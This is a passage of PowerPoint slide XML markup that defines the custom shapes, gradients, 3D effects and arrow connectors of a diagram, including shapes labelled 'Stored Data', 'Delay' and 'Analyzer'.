                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3783366" y="2241323"/>
            <a:ext cx="853157" cy="1319315"/>
            <a:chOff x="6415088" y="4561270"/>
            <a:chExt cx="893731" cy="1382058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6435912" y="4572000"/>
              <a:ext cx="859117" cy="1352176"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY0" fmla="*/ 287618 h 1352176"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 859117"/>
                <a:gd name="connsiteY1" fmla="*/ 1139265 h 1352176"/>
                <a:gd name="connsiteX2" fmla="*/ 85912 w 859117"/>
                <a:gd name="connsiteY2" fmla="*/ 1243853 h 1352176"/>
                <a:gd name="connsiteX3" fmla="*/ 190500 w 859117"/>
                <a:gd name="connsiteY3" fmla="*/ 1299882 h 1352176"/>
                <a:gd name="connsiteX4" fmla="*/ 332441 w 859117"/>
                <a:gd name="connsiteY4" fmla="*/ 1352176 h 1352176"/>
                <a:gd name="connsiteX5" fmla="*/ 381000 w 859117"/>
                <a:gd name="connsiteY5" fmla="*/ 1333500 h 1352176"/>
                <a:gd name="connsiteX6" fmla="*/ 859117 w 859117"/>
                <a:gd name="connsiteY6" fmla="*/ 1064559 h 1352176"/>
                <a:gd name="connsiteX7" fmla="*/ 847912 w 859117"/>
                <a:gd name="connsiteY7" fmla="*/ 216647 h 1352176"/>
                <a:gd name="connsiteX8" fmla="*/ 481853 w 859117"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 1352176"/>
                <a:gd name="connsiteX9" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY9" fmla="*/ 287618 h 1352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59117" h="1352176">
                  <a:moveTo>
                    <a:pt x="3735" y="287618"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1139265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85912" y="1243853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="1299882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332441" y="1352176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859117" y="1064559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="847912" y="216647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481853" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3735" y="287618"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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15088" y="4561270"/>
              <a:ext cx="893731" cy="1382058"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1895298" y="2958353"/>
            <a:ext cx="1746601" cy="1143001"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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H="1">
            <a:off x="1915688" y="3334871"/>
            <a:ext cx="1690765" cy="1139097"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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1151087" y="3334871"/>
            <a:ext cx="1982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Analyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="Group 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3459001" y="4608597"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Rectangle 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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Trapezoid 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
